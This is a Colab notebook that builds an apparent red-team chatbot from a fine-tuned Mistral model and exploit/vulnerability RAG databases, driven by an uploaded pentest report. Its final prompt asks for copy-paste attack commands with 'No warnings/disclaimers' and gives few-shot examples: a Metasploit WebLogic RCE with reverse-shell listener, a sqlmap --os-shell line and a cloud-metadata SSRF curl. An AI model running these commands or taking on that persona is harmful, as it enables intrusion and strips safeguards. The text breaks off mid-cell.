In [1]:
# Cell 1: Install Libraries (Stable Version)
print("Installing the stable version of Unsloth...")
# This command installs the latest stable version from PyPI
!pip install "unsloth[colab-new]"

print("\nInstalling libraries for RAG...")
!pip install -q langchain langchain_community langchain_huggingface faiss-cpu sentence-transformers

print("\n✅ Installation complete. PLEASE RESTART YOUR SESSION NOW.")

Installing the stable version of Unsloth...
Collecting unsloth[colab-new]
  Downloading unsloth-2025.10.10-py3-none-any.whl.metadata (61 kB)
[2K     [90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m [32m61.5/61.5 kB[0m [31m6.8 MB/s[0m eta [36m0:00:00[0m
[?25hCollecting unsloth_zoo>=2025.10.11 (from unsloth[colab-new])
  Downloading unsloth_zoo-2025.10.12-py3-none-any.whl.metadata (32 kB)
Collecting tyro (from unsloth[colab-new])
  Downloading tyro-0.9.35-py3-none-any.whl.metadata (12 kB)
Collecting xformers>=0.0.27.post2 (from unsloth[colab-new])
  Downloading xformers-0.0.32.post2-cp39-abi3-manylinux_2_28_x86_64.whl.metadata (1.1 kB)
Collecting bitsandbytes!=0.46.0,!=0.48.0,>=0.45.5 (from unsloth[colab-new])
  Downloading bitsandbytes-0.48.1-py3-none-manylinux_2_24_x86_64.whl.metadata (10 kB)
Collecting datasets!=4.0.*,!=4.1.0,>=3.4.1 (from unsloth[colab-new])
  Downloading datasets-4.3.0-py3-none-any.whl.metadata (18 kB)
Collecting transformers!=4.52.0,!=4.52.1,!=4.52.2,!=4.5

In [1]:
# Cell 2: Load BASE Model and Tokenizer
from unsloth import FastLanguageModel
import torch
from google.colab import drive

# --- 1. Mount Google Drive ---
print("[*] Mounting Google Drive...")
drive.mount('/content/drive')

# --- 2. Configuration ---
base_model_name = "unsloth/mistral-7b-instruct-v0.2-bnb-4bit"
max_seq_length = 2048
dtype = None
load_in_4bit = True

# --- 3. Load the Base Model ---
print(f"[*] Step 1: Loading BASE model ({base_model_name})...")
base_model, tokenizer = FastLanguageModel.from_pretrained(
    model_name = base_model_name,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
)

# Set the pad token if it's not already set
if tokenizer.pad_token is None:
    tokenizer.pad_token = tokenizer.eos_token

print("\n✅ Base model and tokenizer loaded successfully.")

🦥 Unsloth: Will patch your computer to enable 2x faster free finetuning.




🦥 Unsloth Zoo will now patch everything to make training faster!
[*] Mounting Google Drive...
Mounted at /content/drive
[*] Step 1: Loading BASE model (unsloth/mistral-7b-instruct-v0.2-bnb-4bit)...
==((====))==  Unsloth 2025.10.10: Fast Mistral patching. Transformers: 4.56.2.
   \\   /|    NVIDIA L4. Num GPUs = 1. Max memory: 22.161 GB. Platform: Linux.
O^O/ \_/ \    Torch: 2.8.0+cu126. CUDA: 8.9. CUDA Toolkit: 12.6. Triton: 3.4.0
\        /    Bfloat16 = TRUE. FA [Xformers = 0.0.32.post2. FA2 = False]
 "-____-"     Free license: http://github.com/unslothai/unsloth
Unsloth: Fast downloading is enabled - ignore downloading bars which are red colored!


model.safetensors:   0%|          | 0.00/4.13G [00:00<?, ?B/s]

generation_config.json:   0%|          | 0.00/155 [00:00<?, ?B/s]

tokenizer_config.json: 0.00B [00:00, ?B/s]

tokenizer.model:   0%|          | 0.00/493k [00:00<?, ?B/s]

special_tokens_map.json:   0%|          | 0.00/438 [00:00<?, ?B/s]

tokenizer.json: 0.00B [00:00, ?B/s]


✅ Base model and tokenizer loaded successfully.


In [2]:
# Cell 2.5: Load Fine-Tuned Model Adapters
from peft import PeftModel

adapter_path = "/content/drive/My Drive/sih fine tuned model"
print(f"[*] Step 2: Applying fine-tuned adapters from: {adapter_path}")

# This command applies your adapters to the base_model to create the expert model
finetuned_model = PeftModel.from_pretrained(base_model, adapter_path)

print("✅ Fine-tuned model created successfully.")

[*] Step 2: Applying fine-tuned adapters from: /content/drive/My Drive/sih fine tuned model
✅ Fine-tuned model created successfully.


In [3]:
# Cell 3: Load All Three RAG Databases

from langchain_community.vectorstores import FAISS
from langchain_huggingface import HuggingFaceEmbeddings
import os

# --- 1. Initialize the Embedding Model (do this once) ---
print("\n[*] Initializing embedding model...")
embedding_model = HuggingFaceEmbeddings(model_name="sentence-transformers/all-MiniLM-L6-v2")

# --- 2. Define Paths and Load Database #1a (NVD) ---
db_path_1a = "/content/drive/My Drive/sih rag/rag 1"
if not os.path.exists(db_path_1a):
    raise FileNotFoundError(f"❌ Database #1a (NVD) not found at: {db_path_1a}")

print("\n📦 Loading RAG Database #1a (NVD)...")
vector_db_1a = FAISS.load_local(
    folder_path=db_path_1a,
    embeddings=embedding_model,
    allow_dangerous_deserialization=True
)
print("✅ Database #1a loaded successfully.")

# --- 3. Define Paths and Load Database #1b (CISA & ExploitDB) ---
db_path_1b = "/content/drive/My Drive/sih rag/rag 1 b database"
if not os.path.exists(db_path_1b):
    raise FileNotFoundError(f"❌ Database #1b (CISA/ExploitDB) not found at: {db_path_1b}")

print("\n📦 Loading RAG Database #1b (CISA & ExploitDB)...")
vector_db_1b = FAISS.load_local(
    folder_path=db_path_1b,
    embeddings=embedding_model,
    allow_dangerous_deserialization=True
)
print("✅ Database #1b loaded successfully.")

# --- 4. Define Paths and Load Database #2 (Tactics) ---
db_path_2 = "/content/drive/My Drive/sih rag/rag 2"
if not os.path.exists(db_path_2):
    raise FileNotFoundError(f"❌ Database #2 (Tactics) not found at: {db_path_2}")

print("\n📦 Loading RAG Database #2 (Tactics & Techniques)...")
vector_db_2 = FAISS.load_local(
    folder_path=db_path_2,
    embeddings=embedding_model,
    allow_dangerous_deserialization=True
)
print("✅ Database #2 loaded successfully.")


[*] Initializing embedding model...


modules.json:   0%|          | 0.00/349 [00:00<?, ?B/s]

config_sentence_transformers.json:   0%|          | 0.00/116 [00:00<?, ?B/s]

README.md: 0.00B [00:00, ?B/s]

sentence_bert_config.json:   0%|          | 0.00/53.0 [00:00<?, ?B/s]

config.json:   0%|          | 0.00/612 [00:00<?, ?B/s]

model.safetensors:   0%|          | 0.00/90.9M [00:00<?, ?B/s]

tokenizer_config.json:   0%|          | 0.00/350 [00:00<?, ?B/s]

vocab.txt: 0.00B [00:00, ?B/s]

tokenizer.json: 0.00B [00:00, ?B/s]

special_tokens_map.json:   0%|          | 0.00/112 [00:00<?, ?B/s]

config.json:   0%|          | 0.00/190 [00:00<?, ?B/s]


📦 Loading RAG Database #1a (NVD)...
✅ Database #1a loaded successfully.

📦 Loading RAG Database #1b (CISA & ExploitDB)...
✅ Database #1b loaded successfully.

📦 Loading RAG Database #2 (Tactics & Techniques)...
✅ Database #2 loaded successfully.


In [4]:
# Cell 4 (Updated): The Intelligent Query Router & Multi-Retriever

def classify_query(user_query):
    """
    Uses the base LLM to classify the user's query.
    """
    prompt = f"""[INST] Analyze the user's question and classify its primary intent. Respond with ONLY one of the following three words:
    - 'vulnerability_details': If the question is asking for a description, explanation, or CVSS score.
    - 'exploit_commands': If the question is asking for a specific attack command or exploit.
    - 'attack_tactics': If the question is asking for a high-level plan or attack chain.

    User Question: "{user_query}"
    Classification: [/INST]"""

    inputs = tokenizer(prompt, return_tensors="pt").to("cuda")

    # 🔽 CRITICAL FIX: Use 'base_model' here, not 'model' 🔽
    outputs = base_model.generate(**inputs, max_new_tokens=10, pad_token_id=tokenizer.eos_token_id)

    classification = tokenizer.decode(outputs[0], skip_special_tokens=True).split("Classification:")[-1].strip().lower()

    if "tactic" in classification: return "attack_tactics"
    if "exploit" in classification: return "exploit_commands"
    return "vulnerability_details"

def retrieve_context(user_query, k=7):
    """
    Intelligently routes the query to the correct RAG databases and combines the context.
    """
    print(f"[*] User Query: '{user_query}'")
    intent = classify_query(user_query)
    print(f"[*] Query Intent Classified as: '{intent}'")

    all_retrieved_docs = []

    print("--> Searching in Database #1b (CISA & Exploit-DB)...")
    retriever_1b = vector_db_1b.as_retriever(search_kwargs={"k": k})
    all_retrieved_docs.extend(retriever_1b.invoke(user_query)) # Use .invoke()

    if intent == "attack_tactics":
        print("--> Also searching in Database #2 (Tactics & Techniques)...")
        retriever_2 = vector_db_2.as_retriever(search_kwargs={"k": k})
        all_retrieved_docs.extend(retriever_2.invoke(user_query))

    if intent == "vulnerability_details":
        print("--> Also searching in Database #1a (NVD)...")
        retriever_1a = vector_db_1a.as_retriever(search_kwargs={"k": k})
        all_retrieved_docs.extend(retriever_1a.invoke(user_query))

    return "\n---\n".join([doc.page_content for doc in all_retrieved_docs])

print("✅ Intelligent Query Router and Multi-Retriever functions are ready.")

✅ Intelligent Query Router and Multi-Retriever functions are ready.


In [5]:
# # Cell 4.5: Install OCR Libraries
# print("Installing Tesseract OCR and supporting libraries...")
# !apt-get install -y tesseract-ocr poppler-utils
# !pip install -q pytesseract pdf2image
# print("✅ OCR libraries installed.")

In [6]:
# Cell 5: Manual PDF Report Uploader (Non-OCR Version)
!pip install PyPDF2
import PyPDF2
from google.colab import files
import PyPDF2 # Use PyPDF2 directly
import io

combined_report_content = ""
print("Please upload your TEXT-BASED PDF reconnaissance report...")
uploaded = files.upload()

if uploaded:
    file_name = next(iter(uploaded))
    print(f"\nProcessing '{file_name}'...")
    pdf_bytes = uploaded[file_name]
    try:
        pdf_reader = PyPDF2.PdfReader(io.BytesIO(pdf_bytes))
        num_pages = len(pdf_reader.pages)
        print(f"Successfully read PDF with {num_pages} page(s). Extracting text...")
        for page_num in range(num_pages):
            page = pdf_reader.pages[page_num]
            combined_report_content += page.extract_text() or "" # Add 'or ""' for safety

        if combined_report_content:
             print("\n✅ Text extraction complete. You can now run the next cell.")
        else:
             print("\n⚠️ Text extraction failed. The PDF might be image-based or corrupted.")
             combined_report_content = "" # Ensure it's empty on failure

    except Exception as e:
        print(f"❌ Error reading PDF file: {e}")
        combined_report_content = ""
else:
    print("\nNo file was selected.")

Collecting PyPDF2
  Downloading pypdf2-3.0.1-py3-none-any.whl.metadata (6.8 kB)
Downloading pypdf2-3.0.1-py3-none-any.whl (232 kB)
[?25l   [90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m [32m0.0/232.6 kB[0m [31m?[0m eta [36m-:--:--[0m[2K   [90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m [32m232.6/232.6 kB[0m [31m22.5 MB/s[0m eta [36m0:00:00[0m
[?25hInstalling collected packages: PyPDF2
Successfully installed PyPDF2-3.0.1
Please upload your TEXT-BASED PDF reconnaissance report...


Saving full_report_for_analysis.pdf to full_report_for_analysis.pdf

Processing 'full_report_for_analysis.pdf'...
Successfully read PDF with 4 page(s). Extracting text...

✅ Text extraction complete. You can now run the next cell.


In [7]:
# Cell 6 (Updated): Split Report into Semantic Chunks

from langchain.text_splitter import RecursiveCharacterTextSplitter

# This will hold the final text chunks for the LLM to process
report_chunks = []

if 'combined_report_content' in locals() and combined_report_content:
    print("Pre-processing: Splitting the report into semantic chunks...")

    # --- 1. Initialize the Text Splitter ---
    # chunk_size: Reduced to 1500 for better LLM prompt fit.
    # chunk_overlap: 250 for context retention.
    text_splitter = RecursiveCharacterTextSplitter(
        chunk_size=1500,  # As discussed: Smaller for extraction prompts
        chunk_overlap=250,
        length_function=len,
    )

    # --- 2. Create the Chunks ---
    report_chunks = text_splitter.split_text(combined_report_content)

    if report_chunks:
        print(f"\n✅ Successfully split the report into {len(report_chunks)} chunks.")
        print("\n--- EXAMPLE CHUNK (This will be input for extraction in next cell) ---")
        print(report_chunks[0][:500] + "...")  # Truncated preview
    else:
        print("\n❌ Could not split the report. The content might be empty.")

else:
    print("\n❌ No content loaded. Please run the PDF upload cell first.")

Pre-processing: Splitting the report into semantic chunks...

✅ Successfully split the report into 8 chunks.

--- EXAMPLE CHUNK (This will be input for extraction in next cell) ---
Vulnerability Assessment & Penetration Test Report
Target: www.securecorp.net (10.10.10.5)
Date: October 15, 2025
Author: Cyber Sentinel AI Test Division
---
Page 2: Table of Contents
1. Executive Summary
2. Engagement Scope & Methodology
3. Findings Summary
4. Detailed Findings
    4.1 CRITICAL: Remote Code Execution via Image Upload Bypass
    4.2 HIGH: Privilege Escalation via Sudo Misconfiguration
    4.3 HIGH: Stored Cross-Site Scripting (XSS) in Comment Section
    4.4 MEDIUM: SQL Injectio...


In [8]:
# Cell 7.5 (Updated): Hybrid Regex + JSON Vulnerability Extraction (With Fixes)
import re
import json
from IPython.display import display, Markdown
from tqdm.notebook import tqdm
import time
import torch  # Ensure torch is imported for no_grad

# Your provided regex patterns (minimal & keywords)
CVE_PATTERN = r"\bCVE-\d{4}-\d+\b"
CWE_PATTERN = r"\bCWE-\d+\b"
CVSS_PATTERN = r"CVSS(?:v3(?:\.1)?)?\s*[:]? \s*\d(?:\.\d+)?"
VULN_KEYWORDS = [r"\bvulnerab", r"\bexploit\b", r"\bremote code execution\b", r"\bprivilege escalation\b",
                 r"\bbuffer overflow\b", r"\bSQL injection\b", r"\bXSS\b", r"\bRCE\b"]

# Helper: Extract matches from chunk
def extract_with_regex(chunk):
    """Scan chunk with patterns; return dict of matches for bootstrapping."""
    matches = {
        'cves': re.findall(CVE_PATTERN, chunk, re.IGNORECASE),
        'cwes': re.findall(CWE_PATTERN, chunk, re.IGNORECASE),
        'cvss_scores': re.findall(CVSS_PATTERN, chunk, re.IGNORECASE),
        'keywords': [re.search(kw, chunk, re.IGNORECASE).group() for kw in VULN_KEYWORDS if re.search(kw, chunk, re.IGNORECASE)]
    }
    # Highlight evidence snippets around matches
    evidence = []
    all_matches = matches['cves'] + matches['cwes'] + matches['cvss_scores']
    for match in all_matches:
        idx = chunk.lower().find(match.lower())
        if idx != -1:
            start = max(0, idx - 25)
            end = min(len(chunk), idx + len(match) + 25)
            evidence.append(chunk[start:end])
    matches['evidence_snippets'] = evidence[:3]  # Limit to top 3
    return matches if any(matches.values()) else None  # None if no hits

# NEW: JSON Repair Function (Handles Noisy Outputs)
def repair_json(text):
    """Extract and fix JSON array from potentially noisy model output."""
    # Strip common prefixes/suffixes
    text = re.sub(r'^.*?(\[.*?\]).*?$', r'\1', text.strip(), flags=re.DOTALL)
    if not text.startswith('['):
        text = '[' + text + ']'
    try:
        return json.loads(text)
    except json.JSONDecodeError:
        # Fallback: Empty list
        return []

# Helper: Convert JSON vuln object to Markdown row
def json_to_markdown(vuln):
    """Map JSON fields to table row."""
    title = vuln.get('title', 'Untitled Finding')
    cves = ', '.join(vuln.get('cves', [])) or 'None'
    sev = vuln.get('severity', 'UNKNOWN')
    desc = vuln.get('description', 'No description')
    rem = vuln.get('remediation', 'N/A')
    # Combine title/CVEs for first column
    finding = f"{title} ({cves})" if cves != 'None' else title
    return f"| {finding} | {sev} | {desc} | {rem} |"

# NEW: Generate Fallback Rows from Regex (Enhanced for Keywords)
def generate_regex_rows(regex_matches):
    """Create MD rows from regex hits (CVEs + keywords)."""
    rows = []
    # CVE/CWE/CVSS rows
    for cve in set(regex_matches.get('cves', [])):
        rows.append({
            'title': f'CVE Alert: {cve}',
            'cves': [cve],
            'severity': 'HIGH',  # Default
            'description': f'Detected CVE {cve} in report.',
            'remediation': 'Investigate and patch immediately.',
            'evidence_snippet': regex_matches['evidence_snippets'][0] if regex_matches['evidence_snippets'] else '',
            'confidence': 'MEDIUM'
        })
    for cwe in set(regex_matches.get('cwes', [])):
        rows.append({
            'title': f'CWE Alert: {cwe}',
            'cves': [],
            'severity': 'MEDIUM',
            'description': f'Detected CWE {cwe} pattern.',
            'remediation': 'Review for common weakness.',
            'evidence_snippet': regex_matches['evidence_snippets'][0] if regex_matches['evidence_snippets'] else '',
            'confidence': 'LOW'
        })
    # Keyword-based generic rows (group similar)
    unique_keywords = set(regex_matches.get('keywords', []))
    for kw in unique_keywords:
        rows.append({
            'title': f'Potential {kw.capitalize()} Issue',
            'cves': [],
            'severity': 'MEDIUM',
            'description': f'Suspicious keyword "{kw}" detected—possible vulnerability.',
            'remediation': 'Manual verification required.',
            'evidence_snippet': chunk[:100] + '...',  # Use chunk preview
            'confidence': 'LOW'
        })
    return rows

if 'report_chunks' in locals() and report_chunks:
    print("\n🚀 Enhanced Vulnerability Extraction Starting...")
    start_time = time.time()

    table_header = "| Vulnerability / Finding | Severity | Description & Impact | Recommended Solution |\n| :--- | :--- | :--- | :--- |"
    all_vulns = []  # Collect JSON objects for aggregation

    for i, chunk in enumerate(tqdm(report_chunks, desc="Processing Chunks")):  # Note: Use local 'chunk' in fallback
        # Step 1: Regex pre-scan (always run)
        regex_matches = extract_with_regex(chunk)
        has_regex_hits = bool(regex_matches)

        # Generate regex fallback rows immediately (enrich later)
        regex_rows = generate_regex_rows(regex_matches) if has_regex_hits else []
        all_vulns.extend(regex_rows)

        # Step 2: Prepare chunk for LLM (truncate + highlight regex hits)
        chunk_text = chunk[:1200]  # Truncate to fit prompt + context
        if has_regex_hits:
            highlights = f"\n[Regex Highlights: CVEs={regex_matches['cves']}, Keywords={regex_matches['keywords'][:2]}, Evidence={regex_matches['evidence_snippets'][:1]}]"
            chunk_text += highlights  # Boost LLM with evidence

        # Step 3: JSON Extraction Prompt (your exact prompt)
        analysis_prompt = f"""[INST]
You are a strict extractor. Read the input CHUNK and output ONLY a JSON array (possibly empty) of objects with keys:
- title (short title string)
- cves (array of CVE strings, e.g. ["CVE-2024-12345"])
- severity (one of: CRITICAL, HIGH, MEDIUM, LOW, UNKNOWN)
- description (one-sentence summary)
- remediation (short remediation text or empty string)
- evidence_snippet (exact text excerpt from the chunk supporting this finding)
- confidence (HIGH, MEDIUM, LOW) -- self-assessed

If there are no vulnerabilities, output: []
Do NOT add any other text, explanation, or markup.
[CHUNK]
{chunk_text}
[/INST]"""

        # Generate with base_model (optimized for speed)
        inputs = tokenizer(analysis_prompt, return_tensors="pt", truncation=True, max_length=2048).to("cuda")
        with torch.no_grad():
            outputs = base_model.generate(
                **inputs,
                max_new_tokens=128,  # Shorter for faster JSON
                temperature=0.1,
                do_sample=False,  # Greedy for consistency
                pad_token_id=tokenizer.eos_token_id,
                repetition_penalty=1.1,
                early_stopping=True  # Stop at eos for brevity
            )

        response_text = tokenizer.decode(outputs[0], skip_special_tokens=True).split('[/INST]')[-1].strip()

        # DEBUG: Print raw response (remove after fixing)
        print(f"  Chunk {i+1} Raw Response (first 200 chars): '{response_text[:200]}...'")

        # Step 4: Parse JSON with Repair
        vulns_json = repair_json(response_text)
        if isinstance(vulns_json, list):
            # Filter by confidence
            filtered_vulns = [v for v in vulns_json if v.get('confidence', 'LOW') in ['HIGH', 'MEDIUM']]
            all_vulns.extend(filtered_vulns)
            print(f"  Chunk {i+1}: {len(filtered_vulns)} vulns from JSON + {len(regex_rows)} from regex")
        else:
            print(f"  Chunk {i+1}: Still invalid after repair—using regex only")

        # Debug print for regex
        if has_regex_hits:
            print(f"    Regex hits: {len(regex_matches['cves'])} CVEs, {len(regex_matches['keywords'])} keywords")

    # Step 5: Aggregate & Convert to Markdown
    markdown_rows = []
    seen_findings = set()  # Dedupe by title + CVE
    for vuln in all_vulns:
        row_key = f"{vuln.get('title', '')}_{vuln.get('cves', [])}"
        if row_key not in seen_findings:
            seen_findings.add(row_key)
            markdown_rows.append(json_to_markdown(vuln))

    markdown_rows = markdown_rows[:15]  # Cap for table readability

    # Save & Display
    if markdown_rows:
        final_report_md = table_header + "\n" + "\n".join(markdown_rows)
        with open("summarized_vulnerability_report.md", "w") as f:
            f.write(final_report_md)
        print(f"\n⏱️ Total time: {time.time() - start_time:.1f}s | Rows: {len(markdown_rows)}")
        print("\n" + "="*50 + " FINAL REPORT " + "="*50)
        display(Markdown(final_report_md))
    else:
        # Fallback empty table
        fallback_md = table_header + "\n| No vulnerabilities detected | N/A | Full scan complete—recommend manual review. | Re-run with deeper tools. |"
        with open("summarized_vulnerability_report.md", "w") as f:
            f.write(fallback_md)
        print(f"\n⏱️ Total time: {time.time() - start_time:.1f}s | No rows—check report content.")
        display(Markdown(fallback_md))
else:
    print("\n❌ Run PDF extraction and chunking first.")


🚀 Enhanced Vulnerability Extraction Starting...


Processing Chunks:   0%|          | 0/8 [00:00<?, ?it/s]

  Chunk 1 Raw Response (first 200 chars): '[INSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINS...'
  Chunk 1: 0 vulns from JSON + 5 from regex
    Regex hits: 0 CVEs, 5 keywords
  Chunk 2 Raw Response (first 200 chars): '[INSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINS...'
  Chunk 2: 0 vulns from JSON + 3 from regex
    Regex hits: 0 CVEs, 3 keywords
  Chunk 3 Raw Response (first 200 chars): '[INSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINSTINS...'
  Chunk 3: 0 vulns from JSON + 5 from regex
    Regex hits: 0 CVEs, 5 keywords
  Chunk 4 Raw Respo

| Vulnerability / Finding | Severity | Description & Impact | Recommended Solution |
| :--- | :--- | :--- | :--- |
| Potential Sql injection Issue | MEDIUM | Suspicious keyword "SQL Injection" detected—possible vulnerability. | Manual verification required. |
| Potential Xss Issue | MEDIUM | Suspicious keyword "XSS" detected—possible vulnerability. | Manual verification required. |
| Potential Vulnerab Issue | MEDIUM | Suspicious keyword "Vulnerab" detected—possible vulnerability. | Manual verification required. |
| Potential Remote code execution Issue | MEDIUM | Suspicious keyword "Remote Code Execution" detected—possible vulnerability. | Manual verification required. |
| Potential Privilege escalation Issue | MEDIUM | Suspicious keyword "Privilege Escalation" detected—possible vulnerability. | Manual verification required. |
| CVE Alert: CVE-2023-51443 (CVE-2023-51443) | HIGH | Detected CVE CVE-2023-51443 in report. | Investigate and patch immediately. |

In [9]:
# Final Cell (Updated): The "Grounding and Verification" Chatbot (Fixed Decoding & RAG - Optimized Output)

from IPython.display import display, Markdown, HTML
import ipywidgets as widgets
import re
import torch  # Ensure torch for no_grad

# Global device setup (avoids scope issues)
device = "cuda" if torch.cuda.is_available() else "cpu"
print(f"[*] Device set to {device}")

# --- 1. Load the SUMMARIZED Report Context (From Extraction) ---
try:
    with open("summarized_vulnerability_report.md", "r", encoding="utf-8") as f:
        vulnerability_context = f.read()
    print("✅ Loaded summarized_vulnerability_report.md for grounding.")
except FileNotFoundError:
    print("❌ 'summarized_vulnerability_report.md' not found. Run the extraction cell (e.g., Cell 7.5) first.")
    vulnerability_context = "| No vulnerabilities extracted | N/A | Please run extraction. | N/A |"

# Fallback to combined_report_content if available
if vulnerability_context.strip() == "| No vulnerabilities extracted | N/A | Please run extraction. | N/A |":
    if 'combined_report_content' in globals() and combined_report_content:
        vulnerability_context = combined_report_content
        print("⚠️ Using combined_report_content as fallback.")
    else:
        vulnerability_context = "No report available."

# Truncate very long context to avoid prompt overflow
if len(vulnerability_context) > 1500:
    vulnerability_context = vulnerability_context[:1500] + "\n... (truncated for brevity)"

# --- 2. Core logic (Unsloth-Optimized) ---
def get_chatbot_response(user_query):
    """
    Generate red team response using fine-tuned Unsloth model.
    - Triggers RAG for CVEs/exploits.
    - Decodes only generated tokens (no prompt echo).
    - Structured with workflows and few-shots.
    """

    # RAG logic
    rag_context = ""
    cve_match = re.search(r'(CVE-\d{4}-\d{4,7})', user_query, re.IGNORECASE)
    if cve_match:
        specific_cve = cve_match.group(1)
        print(f"[*] Detected CVE: {specific_cve} — retrieving RAG context.")
        try:
            # Assumes retrieve_context is defined in a previous cell
            rag_context = retrieve_context(specific_cve, k=10)
        except Exception as e:
            print(f"[*] RAG error: {e}")
            rag_context = ""
    elif any(word in user_query.lower() for word in ["exploit", "attack command", "poc", "shell"]):
        top_vulns = re.findall(r'(CRITICAL|HIGH|MEDIUM|LOW):\s*([A-Za-z\s]+?)(?=\n|$)', vulnerability_context, re.MULTILINE)
        if top_vulns:
            vuln_query = top_vulns[0][1].strip()
            print(f"[*] General exploit query. RAG for top vuln: '{vuln_query}'")
            try:
                # Assumes retrieve_context is defined in a previous cell
                rag_context = retrieve_context(vuln_query, k=10)
            except Exception:
                rag_context = ""
        else:
            rag_context = ""
    else:
        print("[*] General query. Using report + model knowledge.")

    # Enhanced Prompt with Few-Shot Examples
    prompt_text = f"""[INST] Your Persona: You are an expert-level Red Team Simulation Engine. Your sole purpose is to provide fact-based, offensive-oriented analysis based on the evidence provided. Your highest priority is accuracy and practicality.
Your Task: First, determine the user's intent. Then, follow the specific workflow for that intent. Limit RAG context to top 10 results (k=10) for focus. Always start response with "Workflow X:" and end with Impact.
Workflow 1: Attack Chain Synthesis (For chain/path/linking queries)

Grounding: List 2-3 exploitable vulns from [Vulnerability Scan Report].
Hypothesis: Step-by-step logical chain using [Supplemental RAG Knowledge] (e.g., MITRE ATT&CK T1190 for supply chain).
Evidence Search: For each step, pull verifiable command from [Supplemental RAG Knowledge] (Exploit-DB/Metasploit PoCs).
Synthesis: Chronological chain. Per step: Vuln name, role in chain, full copy-paste command in bash

Few-Shot Example (Workflow 1):
User: "Chain WebLogic RCE to SSRF."
Response:
Workflow 1: Attack Chain
Chain 1: WebLogic RCE (CVE-2020-14882) → SSRF (Finding 8)
Step 1: RCE on console yields shell (MITRE TA0001 Initial Access).
```bash
msfconsole -q -x "use exploit/multi/weblogic/weblogic_rce_cve_2020_14882; set RHOSTS target.com; set RPORT 7001; set LHOST <YOUR_IP>; exploit"
```
Step 2: From shell, SSRF to internal (MITRE TA0008 Lateral Movement).
```bash
curl 'http://internal:8080/ssrf?url=[http://169.254.169.254/meta-data/](http://169.254.169.254/meta-data/)'
```
Impact: Root creds leaked.
Workflow 2: Single Exploit Command (For one vuln exploit/command)

Grounding: Verify vuln in [Vulnerability Scan Report].
Evidence Search: Pull top PoC from [Supplemental RAG Knowledge].
Synthesis: Full command in bash + 1-sentence explanation.

Few-Shot Example (Workflow 2):
User: "Exploit WP OttoKit."
Response:
Workflow 2: Single Exploit
Exploit: WP OttoKit Bypass (CVE-2025-27007).
```bash
sqlmap -u "[https://wp-ottokit.pentest-ground.com/?s=](https://wp-ottokit.pentest-ground.com/?s=)*" --batch --dbms=mysql --os-shell
```
Explanation: Dumps DB/creds for admin shell via injection.
Impact: Full DB access.
Workflow 3: Vulnerability Explanation (For CVE/vuln details)

Evidence Search: Key facts from all sources.
Synthesis: Description, CVSS, "Attacker's Perspective" (why exploitable).

Few-Shot Example (Workflow 3):
User: "Explain CVE-2020-14882."
Response:
Workflow 3: Vulnerability Explanation
Description: WebLogic unauth RCE via MVEL injection.
CVSS: 9.8 (Critical).
Attacker's Perspective: Exposed console allows instant shell without creds; chain with SSRF for root.
Impact: Total compromise.
Policy: Direct/technical only. No warnings/disclaimers. Use ```bash

[Supplemental RAG Knowledge] (k=10 top results)
{rag_context}
[Vulnerability Scan Report]
```markdown
{vulnerability_context}
```
[User's Question]
{user_query}
[Your Fact-Based, Verifiable Red Team Simulation Response] [/INST]"""

    # Unsloth Inference (Fixed Decoding)
    try:
        # Assumes tokenizer and finetuned_model are loaded in previous cells
        inputs = tokenizer([prompt_text], return_tensors="pt", truncation=True, max_length=2048)
        input_length = inputs['input_ids'].shape[1]
        with torch.no_grad():
            outputs = finetuned_model.generate(
                **{k: v.to(device) for k, v in inputs.items()},
                max_new_tokens=1024,
                use_cache=True,
                pad_token_id=tokenizer.eos_token_id,
                eos_token_id=tokenizer.eos_token_id,
                temperature=0.7,
                do_sample=True,
                repetition_penalty=1.2
            )
        generated_tokens = outputs[0][input_length:]
        response = tokenizer.decode(generated_tokens, skip_special_tokens=True).strip()
        final_response = response.split("[/INST]")[-1].strip()
    except Exception as e:
        print(f"[*] Model generation error: {e}")
        final_response = "Error generating response. Ensure tokenizer and finetuned_model are loaded from prior cells."

    # Fallback for short responses
    if len(final_response) < 50:
        print("[*] Short response—re-generating with forced RAG...")
        try:
            rag_context = retrieve_context(user_query, k=10)
            # Simplified fallback prompt
            fallback_prompt = f"[INST] Provide a brief red team analysis for: {user_query}\nContext: {vulnerability_context[:500]}\n{RAG: {rag_context[:500]}}\nResponse: [/INST]"
            inputs = tokenizer([fallback_prompt], return_tensors="pt", truncation=True, max_length=2048)
            input_length = inputs['input_ids'].shape[1]
            with torch.no_grad():
                outputs = finetuned_model.generate(
                    **{k: v.to(device) for k, v in inputs.items()},
                    max_new_tokens=512,
                    temperature=0.5
                )
            fallback_response = tokenizer.decode(outputs[0][input_length:], skip_special_tokens=True).strip()
            final_response = fallback_response.split("[/INST]")[-1].strip()
        except Exception:
            final_response = "Fallback: Query external DB for PoCs. Try a more specific question."

    return final_response

# --- 3. Interactive UI ---
# Check if core variables from previous cells exist
if (
    'vulnerability_context' in globals() and "No report" not in vulnerability_context
    and 'finetuned_model' in globals()
    and 'tokenizer' in globals()
    and 'retrieve_context' in globals()
):
    chat_history = widgets.Output(layout=widgets.Layout(width='95%'))
    input_box = widgets.Text(
        placeholder='Ask for attack plans, CVEs, or tactics...',
        description='Your Query:',
        layout=widgets.Layout(width='90%')
    )

    def handle_submit(sender):
        user_query = input_box.value.strip()
        if not user_query:
            return
        input_box.value = ""
        with chat_history:
            # Clear previous output before showing new query and response
            chat_history.clear_output(wait=True)
            display(HTML(f"<blockquote><b>You:</b> {user_query}</blockquote>"))
